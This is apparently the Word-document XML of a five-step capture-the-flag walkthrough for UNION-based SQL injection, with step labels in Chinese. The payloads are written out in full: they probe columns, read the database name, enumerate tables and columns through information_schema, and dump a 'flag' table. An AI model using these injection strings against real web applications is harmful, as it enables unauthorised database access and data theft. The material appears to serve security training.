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AADA" w14:textId="77777777" w:rsidR="00DF76A8" w:rsidRDefault="00DF76A8" w:rsidP="00DF76A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2F5173" w14:textId="77777777" w:rsidR="00DF76A8" w:rsidRDefault="00DF76A8" w:rsidP="00DF76A8">
      <w:r>
        <w:t>' or 1=1 union select 1,2,3#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655483F7" w14:textId="77777777" w:rsidR="00DF76A8" w:rsidRDefault="00DF76A8" w:rsidP="00DF76A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765776BD" w14:textId="77777777" w:rsidR="00DF76A8" w:rsidRDefault="00DF76A8" w:rsidP="00DF76A8">
      <w:r>
        <w:t>' or 1=1 union select 1,database(),3#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147332F7" w14:textId="77777777" w:rsidR="00DF76A8" w:rsidRDefault="00DF76A8" w:rsidP="00DF76A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2276DC6A" w14:textId="77777777" w:rsidR="00DF76A8" w:rsidRDefault="00DF76A8" w:rsidP="00DF76A8">
      <w:r>
        <w:t>' or 1=1 union select 1,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">),3 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=database()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F28834" w14:textId="77777777" w:rsidR="00DF76A8" w:rsidRDefault="00DF76A8" w:rsidP="00DF76A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第四步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760077D" w14:textId="77777777" w:rsidR="00DF76A8" w:rsidRDefault="00DF76A8" w:rsidP="00DF76A8">
      <w:r>
        <w:t>' or 1=1 union select 1,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">),3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='flag'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0BFCA9" w14:textId="77777777" w:rsidR="00DF76A8" w:rsidRDefault="00DF76A8" w:rsidP="00DF76A8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第五步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A02E14" w14:textId="28E8A65A" w:rsidR="00E97C37" w:rsidRPr="00E97C37" w:rsidRDefault="00DF76A8" w:rsidP="00DF76A8">
      <w:r>
        <w:t>' or 1=1 union select 1,group_concat(flag),3 from flag#</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E97C37" w:rsidRPr="00E9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74"/>
    <w:rsid w:val="00251FD6"/>
    <w:rsid w:val="00C23674"/>
    <w:rsid w:val="00C90BFE"/>
    <w:rsid w:val="00DF76A8"/>
    <w:rsid w:val="00E97C37"/>
    <w:rsid w:val="00F80482"/>
    <w:rsid w:val="00FB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A10A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ED28D60A-3340-4F44-B2BA-B776C79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 h</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>yr h</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-02T04:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-02T10:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>